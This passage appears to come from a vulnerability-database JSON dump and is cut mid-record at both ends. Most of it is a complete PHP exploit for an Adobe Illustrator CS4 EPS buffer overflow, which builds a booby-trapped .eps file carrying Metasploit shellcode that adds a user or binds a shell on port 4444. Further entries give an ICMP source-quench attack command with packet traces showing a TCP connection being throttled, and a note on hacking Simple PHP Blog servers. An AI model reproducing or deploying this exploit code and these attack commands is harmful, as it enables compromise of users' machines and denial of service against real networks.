"Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) BOF exploit", "sourceData": "====================================================================================\r\nAdobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit\r\n====================================================================================\r\n\r\n\r\n# Title: Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit\r\n# CVE-ID: (2009-4195)\r\n# Author: pyrokinesis\r\n# Published: 2009-12-03\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n<?php\r\n /*\r\n Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\r\n overlong DSC Comment Buffer Overflow Exploit\r\n by Nine:Situations:Group::pyrokinesis\r\n site: http://retrogod.altervista.org/\r\n \r\n An overlong string as DSC comment (more than 42000 bytes)\r\n results in a direct EIP overwrite.\r\n Exception is first-chance so the program will never crash.\r\n At the moment of the redirection EAX and ESI are user-controlled.\r\n This portion of the buffer begins with '%' (it is the next DSC\r\n comment) but as you can see the resulting pattern is\r\n nop-equivalent.\r\n \r\n Tested and working against xp sp3\r\n change the call esi if you need, must be alphabetic\r\n I used a \"call esi\" from comctl32.dll on xp sp3,\r\n change if needed.\r\n \r\n Usage: php 9sg_illu.php\r\n then double-click on the resulting 9sg.eps file\r\n it will bind a shell on port 4444\r\n change the shellcode for your needs even.\r\n \r\n */\r\n \r\n # windows/adduser - 446 bytes\r\n # http://www.metasploit.com\r\n # Encoder: x86/alpha_mixed\r\n # EXITFUNC=seh, USER=adobe, PASS=kills\r\n $_scode_i = \"\\xda\\xc9\\xd9\\x74\\x24\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\r\n \"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\" .\r\n \"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\" .\r\n 
\"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\" .\r\n \"\\x4a\\x49\\x4b\\x4c\\x4a\\x48\\x47\\x34\\x43\\x30\\x43\\x30\\x45\\x50\" .\r\n \"\\x4c\\x4b\\x47\\x35\\x47\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x43\\x48\" .\r\n \"\\x45\\x51\\x4a\\x4f\\x4c\\x4b\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\" .\r\n \"\\x51\\x30\\x45\\x51\\x4a\\x4b\\x47\\x39\\x4c\\x4b\\x50\\x34\\x4c\\x4b\" .\r\n \"\\x43\\x31\\x4a\\x4e\\x50\\x31\\x49\\x50\\x4a\\x39\\x4e\\x4c\\x4d\\x54\" .\r\n \"\\x49\\x50\\x44\\x34\\x45\\x57\\x49\\x51\\x48\\x4a\\x44\\x4d\\x43\\x31\" .\r\n \"\\x49\\x52\\x4a\\x4b\\x4a\\x54\\x47\\x4b\\x46\\x34\\x47\\x54\\x43\\x34\" .\r\n \"\\x43\\x45\\x4a\\x45\\x4c\\x4b\\x51\\x4f\\x47\\x54\\x43\\x31\\x4a\\x4b\" .\r\n \"\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\" .\r\n \"\\x45\\x51\\x4a\\x4b\\x4c\\x4b\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a\\x4b\" .\r\n \"\\x4d\\x59\\x51\\x4c\\x47\\x54\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\" .\r\n \"\\x4b\\x46\\x43\\x50\\x46\\x36\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\" .\r\n \"\\x4c\\x4b\\x47\\x30\\x44\\x4c\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\" .\r\n \"\\x4c\\x4b\\x42\\x48\\x43\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\" .\r\n \"\\x42\\x4a\\x46\\x30\\x42\\x48\\x4c\\x30\\x4d\\x5a\\x44\\x44\\x51\\x4f\" .\r\n \"\\x45\\x38\\x4d\\x48\\x4b\\x4e\\x4c\\x4a\\x44\\x4e\\x51\\x47\\x4b\\x4f\" .\r\n \"\\x4d\\x37\\x42\\x43\\x42\\x4d\\x42\\x44\\x46\\x4e\\x45\\x35\\x43\\x48\" .\r\n \"\\x42\\x45\\x51\\x30\\x46\\x4f\\x45\\x33\\x47\\x50\\x42\\x4e\\x42\\x45\" .\r\n \"\\x42\\x54\\x51\\x30\\x43\\x45\\x43\\x43\\x45\\x35\\x43\\x42\\x51\\x30\" .\r\n \"\\x45\\x31\\x45\\x34\\x42\\x4f\\x42\\x42\\x43\\x55\\x47\\x50\\x42\\x4b\" .\r\n \"\\x45\\x39\\x42\\x4c\\x42\\x4c\\x42\\x53\\x51\\x30\\x46\\x4f\\x51\\x51\" .\r\n \"\\x47\\x34\\x50\\x44\\x51\\x30\\x47\\x56\\x51\\x36\\x51\\x30\\x42\\x4e\" .\r\n \"\\x42\\x45\\x44\\x34\\x47\\x50\\x42\\x4c\\x42\\x4f\\x42\\x43\\x45\\x31\" .\r\n 
\"\\x42\\x4c\\x43\\x57\\x43\\x42\\x42\\x4f\\x44\\x35\\x44\\x30\\x47\\x50\" .\r\n \"\\x47\\x31\\x42\\x44\\x42\\x4d\\x42\\x49\\x42\\x4e\\x45\\x39\\x42\\x53\" .\r\n \"\\x43\\x44\\x42\\x52\\x45\\x31\\x43\\x44\\x42\\x4f\\x44\\x32\\x44\\x33\" .\r\n \"\\x51\\x30\\x45\\x31\\x45\\x34\\x42\\x4f\\x43\\x52\\x42\\x45\\x47\\x50\" .\r\n \"\\x46\\x4f\\x47\\x31\\x47\\x34\\x51\\x54\\x45\\x50\\x41\\x41\";\r\n \r\n # windows/shell_bind_tcp - 696 bytes\r\n # http://www.metasploit.com\r\n # Encoder: x86/alpha_mixed\r\n # EXITFUNC=seh, LPORT=4444, RHOST=\r\n $_scode_ii = \"\\x89\\xe5\\xda\\xd0\\xd9\\x75\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49\" .\r\n \"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" .\r\n \"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" .\r\n \"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" .\r\n \"\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x43\\x5a\\x4a\\x4b\\x50\\x4d\\x4d\\x38\" .\r\n \"\\x4b\\x49\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f\\x45\\x30\\x4c\\x4b\\x42\\x4c\" .\r\n \"\\x46\\x44\\x51\\x34\\x4c\\x4b\\x47\\x35\\x47\\x4c\\x4c\\x4b\\x43\\x4c\" .\r\n \"\\x43\\x35\\x43\\x48\\x43\\x31\\x4a\\x4f\\x4c\\x4b\\x50\\x4f\\x42\\x38\" .\r\n \"\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a\\x4b\\x51\\x59\\x4c\\x4b\" .\r\n \"\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50\\x31\\x49\\x50\\x4a\\x39\" .\r\n \"\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x43\\x44\\x45\\x57\\x49\\x51\\x49\\x5a\" .\r\n \"\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4c\\x34\\x47\\x4b\\x50\\x54\" .\r\n \"\\x51\\x34\\x46\\x48\\x43\\x45\\x4b\\x55\\x4c\\x4b\\x51\\x4f\\x47\\x54\" .\r\n \"\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\" .\r\n \"\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x45\\x53\\x46\\x4c\\x4c\\x4b\" .\r\n \"\\x4b\\x39\\x42\\x4c\\x47\\x54\\x45\\x4c\\x45\\x31\\x48\\x43\\x46\\x51\" . 
\r\n \"\\x49\\x4b\\x45\\x34\\x4c\\x4b\\x50\\x43\\x50\\x30\\x4c\\x4b\\x51\\x50\" .\r\n \"\\x44\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x51\\x50\" .\r\n \"\\x43\\x38\\x51\\x4e\\x45\\x38\\x4c\\x4e\\x50\\x4e\\x44\\x4e\\x4a\\x4c\" .\r\n \"\\x50\\x50\\x4b\\x4f\\x48\\x56\\x45\\x36\\x50\\x53\\x43\\x56\\x45\\x38\" .\r\n \"\\x50\\x33\\x46\\x52\\x45\\x38\\x44\\x37\\x43\\x43\\x47\\x42\\x51\\x4f\" .\r\n \"\\x51\\x44\\x4b\\x4f\\x4e\\x30\\x45\\x38\\x48\\x4b\\x4a\\x4d\\x4b\\x4c\" .\r\n \"\\x47\\x4b\\x50\\x50\\x4b\\x4f\\x49\\x46\\x51\\x4f\\x4c\\x49\\x4a\\x45\" .\r\n \"\\x45\\x36\\x4b\\x31\\x4a\\x4d\\x43\\x38\\x43\\x32\\x51\\x45\\x42\\x4a\" .\r\n \"\\x45\\x52\\x4b\\x4f\\x48\\x50\\x45\\x38\\x4e\\x39\\x44\\x49\\x4b\\x45\" .\r\n \"\\x4e\\x4d\\x46\\x37\\x4b\\x4f\\x48\\x56\\x50\\x53\\x46\\x33\\x51\\x43\" .\r\n \"\\x51\\x43\\x46\\x33\\x51\\x53\\x46\\x33\\x51\\x53\\x46\\x33\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x45\\x36\\x45\\x38\\x42\\x31\\x51\\x4c\\x45\\x36\\x46\\x33\" .\r\n \"\\x4b\\x39\\x4d\\x31\\x4a\\x35\\x42\\x48\\x4e\\x44\\x44\\x5a\\x42\\x50\" .\r\n \"\\x49\\x57\\x51\\x47\\x4b\\x4f\\x49\\x46\\x43\\x5a\\x44\\x50\\x50\\x51\" .\r\n \"\\x51\\x45\\x4b\\x4f\\x48\\x50\\x42\\x48\\x49\\x34\\x4e\\x4d\\x46\\x4e\" .\r\n \"\\x4d\\x39\\x51\\x47\\x4b\\x4f\\x48\\x56\\x51\\x43\\x51\\x45\\x4b\\x4f\" .\r\n \"\\x48\\x50\\x42\\x48\\x4d\\x35\\x51\\x59\\x4b\\x36\\x51\\x59\\x50\\x57\" .\r\n \"\\x4b\\x4f\\x4e\\x36\\x46\\x30\\x50\\x54\\x46\\x34\\x51\\x45\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x4c\\x53\\x45\\x38\\x4d\\x37\\x43\\x49\\x48\\x46\\x44\\x39\" .\r\n \"\\x50\\x57\\x4b\\x4f\\x4e\\x36\\x46\\x35\\x4b\\x4f\\x4e\\x30\\x43\\x56\" .\r\n \"\\x42\\x4a\\x43\\x54\\x42\\x46\\x43\\x58\\x45\\x33\\x42\\x4d\\x4d\\x59\" .\r\n \"\\x4d\\x35\\x43\\x5a\\x46\\x30\\x51\\x49\\x47\\x59\\x48\\x4c\\x4b\\x39\" .\r\n \"\\x4d\\x37\\x43\\x5a\\x50\\x44\\x4d\\x59\\x4b\\x52\\x50\\x31\\x49\\x50\" .\r\n \"\\x4c\\x33\\x4e\\x4a\\x4b\\x4e\\x47\\x32\\x46\\x4d\\x4b\\x4e\\x47\\x32\" .\r\n 
\"\\x46\\x4c\\x4c\\x53\\x4c\\x4d\\x43\\x4a\\x46\\x58\\x4e\\x4b\\x4e\\x4b\" .\r\n \"\\x4e\\x4b\\x43\\x58\\x42\\x52\\x4b\\x4e\\x48\\x33\\x44\\x56\\x4b\\x4f\" .\r\n \"\\x44\\x35\\x47\\x34\\x4b\\x4f\\x48\\x56\\x51\\x4b\\x51\\x47\\x46\\x32\" .\r\n \"\\x46\\x31\\x50\\x51\\x50\\x51\\x42\\x4a\\x45\\x51\\x50\\x51\\x50\\x51\" .\r\n \"\\x51\\x45\\x50\\x51\\x4b\\x4f\\x4e\\x30\\x42\\x48\\x4e\\x4d\\x49\\x49\" .\r\n \"\\x43\\x35\\x48\\x4e\\x51\\x43\\x4b\\x4f\\x49\\x46\\x43\\x5a\\x4b\\x4f\" .\r\n \"\\x4b\\x4f\\x50\\x37\\x4b\\x4f\\x4e\\x30\\x4c\\x4b\\x46\\x37\\x4b\\x4c\" .\r\n \"\\x4d\\x53\\x48\\x44\\x45\\x34\\x4b\\x4f\\x4e\\x36\\x50\\x52\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x42\\x48\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x50\\x53\" .\r\n \"\\x4b\\x4f\\x4e\\x36\\x4b\\x4f\\x48\\x50\\x41\\x41\";\r\n \r\n $_eip = \"\\x57\\x6b\\x41\\x77\"; //0x77416b57 alphabetic call esi, comctl32.dll\r\n \r\n $_boom = \"\\xc5\\xd0\\xd3\\xc6\\x20\\x00\\x00\\x00\\x05\\xc8\\x04\\x00\\x00\\x00\".\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00%\\xc8\\x04\\x00\\xb5I\\x01\\x00\\xff\".\r\n \"\\xff\\x00\\x00\".\r\n \"%!PS-Adobe-3.1\\x20EPSF-3.0\\r\\n\".\r\n \"%ADO_DSC_Encoding:\\x20Windows\\x20Roman\\r\\n\".\r\n \"%\".\r\n str_repeat(\"A\", 41699).\r\n $_eip.\r\n str_repeat(\"A\", 2291).\r\n \"%Title:\\x20Untitled-1.eps\\r\\n\".\r\n \"%AAAAAAAA\". 
// we jump here, nop-equivalent\r\n $_scode_ii.\r\n \": A\\r\\n\".\r\n \"%%For:\\x20alias\\r\\n\".\r\n \"%%CreationDate:\\x2011/27/2009\\r\\n\".\r\n \"%%BoundingBox:\\x200\\x200\\x20227\\x20171\\r\\n\".\r\n \"%%HiResBoundingBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\".\r\n \"%%CropBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\".\r\n \"%%LanguageLevel:\\x202\\r\\n\".\r\n \"%%DocumentData:\\x20Clean7Bit\\r\\n\".\r\n \"%ADOBeginClientInjection:\\x20DocumentHeader\\x20\\\"AI11EPS\\\"\\r\\n\".\r\n \"%%AI8_CreatorVersion:\\x2014.0.0\\r\".\r\n \"%AI9_PrintingDataBegin\\r\".\r\n \"%ADO_BuildNumber:\\x20Adobe\\x20Illustrator(R)\\x2014.0.0\\x20x367\\x20R\\x20agm\\x204.4890\\x20ct\\x205.1541\\r\".\r\n \"%ADO_ContainsXMP:\\x20MainFirst\\r\".\r\n \"%AI7_Thumbnail:\\x20128\\x2096\\x208\\r\".\r\n \"%%BeginData:\\x204096\\x20Hex\\x20Bytes\\r\".\r\n \"%0000330000660000990000CC0033000033330033660033990033CC0033FF\\r\\n\";\r\n file_put_contents(\"9sg.eps\", $_boom);\r\n?>\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8172"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "How to hack a server with Simple PHP Blog\r\nuploading an htaccess file from\r\nimg_upload_cgi.php page.\r\nTested on v0.4.9\r\n\r\nby Demential\r\n\r\nhttp://www.hackish.eu\r\nmailto: deme@hackish.eu\r\n\r\nvideo here: http://hackish.eu/video/phpblog.avi\r\nvlc download: http://www.videolan.org/vlc/", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:DOC:18038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18038", "title": "SimplePHPBlog Hacking", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "modified": 
"2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:VULN:8172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8172", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "Folks,\r\n\r\nIt seems worthless to try to explain over and over again how trivial it is \r\nto perform ICMP-based attacks against TCP. So I have posted on my web site \r\n(http://www.gont.com.ar/tools/icmp-attacks) the same tools that vendors \r\nwere supposed to use to audit their systems, and test their patches.\r\n\r\nHere is a packet trace that shows the blind throughput-reduction attack in \r\naction, with explanations inline.\r\n\r\nScenario:\r\nWeb-browser (10.0.0.1, TCP port 1063) is downloading a large file from a \r\nweb-server (192.168.0.1, TCP port 80).\r\nFor simplicity's sake, let's assume we know the four-tuple that identifies \r\nthe TCP connection (keep reading for an example in which we don't):\r\n\r\nLet's perform the attack.\r\n\r\n# icmp-quench -c 10.0.0.1:1063 -s 192.168.0.1:80 -t server -r 100\r\n\r\n(The client is at 10.0.0.1, using TCP port 1063. The server is at \r\n192.168.0.1, using port 80. Let's attack the server ("-t server"). Limit \r\nthe throughput used for the *attack* to about 100 kbps)\r\n\r\n\r\n01:47:56.830156 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 71, id 3721) (ttl 188, id 38453)\r\n01:47:56.950062 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 124, id 15000) (ttl 61, id 34927)\r\n01:47:57.070066 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 229, id 25845) (ttl 250, id 45209)\r\n01:47:57.079918 10.0.0.1.1063 > 192.168.0.1.80: . 
[tcp sum ok] 232:232(0) \r\nack 291649 win 7312 <nop,nop,timestamp 32232 447226421> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45064)\r\n\r\nSee that the client (10.0.0.1) advertises a window of 7312 bytes. Thus, as \r\nfar as TCP *flow* control is concerned, the webserver could send as many \r\nbytes as 7312.\r\n\r\n\r\n01:47:57.190091 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 222, id 42066) (ttl 123, id 18038)\r\n01:47:57.310057 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 83, id 45730) (ttl 136, id 41605)\r\n01:47:57.400762 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 293097 win 8760 <nop,nop,timestamp 32235 447226421> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45320)\r\n01:47:57.430069 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 104, id 26156) (ttl 85, id 48347)\r\n01:47:57.550065 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 249, id 14568) (ttl 238, id 44119)\r\n01:47:57.670079 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 242, id 49311) (ttl 151, id 10965)\r\n01:47:57.746505 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 294545 win 7312 <nop,nop,timestamp 32238 447226423> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45576)\r\n\r\n\r\nHowever, the ICMP source quench messages have put the connection in the \r\nslow start phase, and thus the server will send only one packet. That is, \r\nTCP's congestion control won't allow the server's TCP to send more than 1 \r\nsegment.\r\n\r\n\r\nThis is the server's data segment:\r\n\r\n01:47:57.750082 192.168.0.1.80 > 10.0.0.1.1063: . 
295993:297441(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226426 32238> (DF) (ttl 64, id 16156)\r\n\r\nHowever, the attacker sends another Source Quench:\r\n\r\n01:47:57.790067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 63, id 14055) (ttl 108, id 3600)\r\n\r\nAnd thus cwnd will be set back to 1, allowing the server to send only one \r\nsegment:\r\n\r\n\r\n01:47:57.832648 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 295993 win 8760 <nop,nop,timestamp 32238 447226423> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45832)\r\n01:47:57.836227 192.168.0.1.80 > 10.0.0.1.1063: . 297441:298889(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226426 32238> (DF) (ttl 64, id 4839)\r\n01:47:57.910080 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 232, id 61992) (ttl 161, id 53393)\r\n01:47:58.030075 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 161, id 60570) (ttl 98, id 2081)\r\n01:47:58.150060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 118, id 15382) (ttl 171, id 61130)\r\n01:47:58.270074 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 131, id 39528) (ttl 116, id 55998)\r\n01:47:58.390072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 136, id 57047) (ttl 249, id 50387)\r\n\r\n\r\nHave a look at the following pattern:\r\n\r\n01:47:58.472928 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 297441 win 7312 <nop,nop,timestamp 32245 447226426> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 47368)\r\n01:47:58.476517 192.168.0.1.80 > 10.0.0.1.1063: . 
298889:300337(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226427 32245> (DF) (ttl 64, id 8494)\r\n01:47:58.510066 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 77, id 32815) (ttl 174, id 50351)\r\n\r\nThe web server receives an ACK, so it sends a data segment. But it then \r\nreceives a number of source quench messages, which will keep cwnd at 1. \r\nThus, the throughput of the connection gets limited to one packet per RTT \r\n(round-trip time).\r\n\r\n\r\n01:47:58.630074 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 66, id 6352) (ttl 187, id 37417)\r\n01:47:58.681557 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 298889 win 8760 <nop,nop,timestamp 32247 447226426> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 47624)\r\n01:47:58.685134 192.168.0.1.80 > 10.0.0.1.1063: . 300337:301785(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226427 32247> (DF) (ttl 64, id 28561)\r\n01:47:58.750068 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 195, id 57048) (ttl 144, id 1692)\r\n01:47:58.877803 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 152, id 10915) (ttl 169, id 39043)\r\n01:47:58.990060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 109, id 62567) (ttl 166, id 57565)\r\n01:47:59.110058 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 122, id 21511) (ttl 199, id 5731)\r\n01:47:59.230059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 139, id 650) (ttl 72, id 37585)\r\n01:47:59.236658 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 300337 win 7312 <nop,nop,timestamp 32252 447226427> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48136)\r\n01:47:59.240247 192.168.0.1.80 > 10.0.0.1.1063: . 
301785:303233(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226429 32252> (DF) (ttl 64, id 13370)\r\n01:47:59.350084 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 96, id 54804) (ttl 97, id 19491)\r\n01:47:59.443666 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 301785 win 8760 <nop,nop,timestamp 32254 447226427> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48392)\r\n01:47:59.447243 192.168.0.1.80 > 10.0.0.1.1063: . 303233:304681(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226429 32254> (DF) (ttl 64, id 16919)\r\n01:47:59.470072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 97, id 18598) (ttl 206, id 23717)\r\n01:47:59.590078 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 194, id 61461) (ttl 111, id 31369)\r\n01:47:59.710058 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 103, id 1646) (ttl 152, id 32425)\r\n01:47:59.830059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 180, id 58070) (ttl 205, id 57556)\r\n01:47:59.950061 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 229, id 31980) (ttl 206, id 14368)\r\n01:47:59.993763 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 303233 win 7312 <nop,nop,timestamp 32259 447226429> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48904)\r\n01:47:59.997340 192.168.0.1.80 > 10.0.0.1.1063: . 
304681:306129(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226430 32259> (DF) (ttl 64, id 1204)\r\n01:48:00.070067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 254, id 60533) (ttl 211, id 48718)\r\n01:48:00.190061 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 143, id 59926) (ttl 248, id 51853)\r\n01:48:00.202233 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 304681 win 8760 <nop,nop,timestamp 32261 447226429> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49160)\r\n01:48:00.205809 192.168.0.1.80 > 10.0.0.1.1063: . 306129:307577(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226430 32261> (DF) (ttl 64, id 15196)\r\n01:48:00.310067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 132, id 20147) (ttl 89, id 21594)\r\n01:48:00.430069 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 221, id 37084) (ttl 134, id 29832)\r\n01:48:00.556726 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 238, id 18625) (ttl 79, id 57860)\r\n01:48:00.634932 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 306129 win 7312 <nop,nop,timestamp 32265 447226430> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49672)\r\n01:48:00.638510 192.168.0.1.80 > 10.0.0.1.1063: . 307577:309025(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226431 32265> (DF) (ttl 64, id 27896)\r\n01:48:00.670072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 187, id 44726) (ttl 132, id 30216)\r\n01:48:00.779869 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 307577 win 8760 <nop,nop,timestamp 32266 447226430> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49928)\r\n01:48:00.783399 192.168.0.1.80 > 10.0.0.1.1063: . 
